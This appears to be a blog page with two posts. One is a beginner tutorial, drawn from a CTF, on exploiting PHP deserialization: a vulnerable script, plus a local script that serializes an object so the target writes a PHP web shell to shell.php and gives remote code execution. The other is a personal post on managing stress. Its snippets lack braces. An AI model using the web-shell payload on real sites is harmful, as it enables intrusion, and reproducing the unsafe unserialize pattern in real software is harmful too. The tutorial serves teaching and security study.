Hacking Security Tutorials

PHP Deserialization

Exploiting it to gain remote code execution

PHP Deserialization is not something that I have much experience of, but having done a CTF recently which required me to exploit PHP deserialization to gain remote access, I realised how straight forward it can be. Through this post, I aim to provide a basic example of a deserialization to RCE exploit for those who aren’t familiar.

Before I share an example, let’s first review what serialization and deserialization mean. This write up assumes you have a very high level understanding of object orientation in programming languages.

What is serialization?

Put simply, serialization is a way to turn an object into a string. For example, you may have a user object in PHP that needs to be transmitted over the network to a users web browser, so that client side scripting such as JavaScript can handle the object, and read the properties of the object.

Essentially, serialization turns the PHP object into a string, ready for transmitting over a network.

What is deserializastion?

Deserialization is very simply the opposite of serialization. It turns a serialized string back into an object.

A vulnerable PHP Script (vuln.php)

I don’t claim to be an expert in serialization so there may well be other methods which I’m not covering, but I hope to show you an example where it is possible to gain Remote Code Execution.

Consider the following vulnerable code which writes the current time to a text file.


$getVar = $_GET['update'];

class timeUpdate
	public $currentTime = '';
        public $outputFile = 'time.txt';

        public function changeTime()
                echo 'The time in the file will be updated imminently.';

        public function __destruct()
		file_put_contents('/home/bootlesshacker/' . $this->outputFile, $this->currentTime);

$timeobject = unserialize($getVar);

$example = new timeUpdate;
$example->currentTime = date("F j, Y, g:i a");


Before we try and work out how to exploit this, let’s understand how this works. The PHP file contains a class called timeUpdate. At the bottom of the script, a new object is created ($example) using the timeUpdate class. The currentTime attribute is then set, and the changeTime function is called. The changeTime function simply echoes a message to advise the time in the file will be updated imminently.

The __destruct() function is then called which writes the contents of the current time to the file stored in the $this->outputFile variable – the reason this function executes is because the script has come to an end and the destruct function is called for any required cleanup activity (or, in this case, to write the current time to the required file).

But how can we exploit this?

You may also notice the file contains a line which uses the unserialize function to unserialize a HTTP GET variable ($_GET[‘update’]). Therefore, if we pass a serialized object string to that GET variable, it will unserialize it and the $timeobject will become the object we pass in via that GET variable.

We can exploit this by creating a timeUpdate object locally on our computer.

Let’s create a PHP file on our own computer to create our object.


class timeUpdate {
	public $currentTime = '<?php system($_GET["cmd"]); ?>';
	public $outputFile = 'shell.php';


echo urlencode(serialize(new timeUpdate));


When we run this file, it creates a new timeUpdate object, sets the currentTime variable to our payload, sets the output file name as shell.php, and then serializes this new object into a string. It then puts this serialized string into the urlencode function.

If we then visit the vulnerable PHP file passing the above value in via the GET parameter, it will create a new file called shell.php with our payload.

http://vulnerable-website.fake/vuln.php?update=OUTPUT FROM OUR SCRIPT

This works because as the vulnerable PHP script executes, it takes our GET parameter, unserializes our object (thereby creating our object within the context of the PHP script). As the script comes to an end, the destruct function for our new object is then called. This creates the new file called shell.php and inserts our payload which we can then use to get remote code execution:

This is a very basic example of exploiting PHP deserialization. The script you come across will likely have a different function, and you will need to identify what the script is doing in order to assess for any serialization vulnerabilities. I hope though this provides a small insight if you’ve not come across this before.

Mental Health

My experience of stress

I recently listened to a podcast episode featuring Troy Hunt, hosted by Ushi. If you haven’t heard of Ushi’s podcast before, check it out here: InfosecWhiskey. Aside from talking about whisky, the episode focuses on stress management, especially during the current turbulent circumstances of the COVID pandemic.

By the way, whilst we’re on the topic of whisky, I can recommend a bottle (or two) of Penderyn Madeira. This is a Welsh whisky (my home country); it is very unlike your typical scotch but it’s definitely enjoyable.

Troy explains his own personal experience of stress management when dealing with the acquisition of his haveibeenpwned service, amongst other things. I strongly recommend reading his blog post covering this topic. It’s a very insightful read into his coping mechanisms.

Listening to Troy and Ushi made me consider my own relationship with stress, and how it impacts me each day. As Troy mentions in his blog, talking about emotions and stress isn’t all that common, especially amongst “blokes” – this is why I felt it important to share my experience.

When I take a step back and review how I deal with stress, I have an unhealthy ability to push through stressful situations. I find my anxieties propel me forward rather than hold me back. This happens without me realising.

I consider this to be an unhealthy habit where I’m constantly battling with different stresses of life. Somehow, completely oblivious to how stressed I am, I just keep battling through each situation, taking a cost on my physical and mental health. I only identify I’m in this situation having sustained high stress for several weeks, by which point I’m very close to (or at) the stage of burnout.


The best way I find I manage my stress is by remaining mindful. I’m not referring to meditation (personally, I can’t remain focused enough to benefit from it). What I mean by mindfulness is simply having awareness over your own emotions, and how you react to different situations. It’s only when you have this awareness you can do something about it. This leads me to my next point.


I often find putting situations into perspective is helpful. For example, how many times have you received an e-mail in work which has pissed you off, keeping you in a bad mood for the rest of the day?

In my experience, whilst these little things can be very annoying and stir a lot of emotion, they are often just that – little things. Having perspective over your situation will help you realise how much worse things could be. That’s not to say your situation, emotion or reaction isn’t valid, but it helps you react to your situation more appropriately, and remain more positive.

Is it really worth letting a small event dictate your emotions for the rest of the day?


This is an obvious one – but it’s one we always forget. Find time to focus on yourself, whether it be a hobby or something else. You need something to escape to.

Book paid time off work – and book it in advanced so you have something to look forward to. Don’t wait until you’re stressed – this is too late. I’m finding this more important during COVID as I find myself taking less leave as I can’t go on holiday, or leave the house during lock-down.

If you’re working from home, I find it helpful to try and separate my work and life environment. This was really challenging when I previously lived in a one-bed flat, but even taking a walk after work can help create that situation.


I’ve only covered a few of the things I find helpful to manage stress – what works for you may be different, but I’m hoping you can get some insight from this blog post. Don’t forget to read Troy Hunt: Sustaining Performance Under Extreme Stress.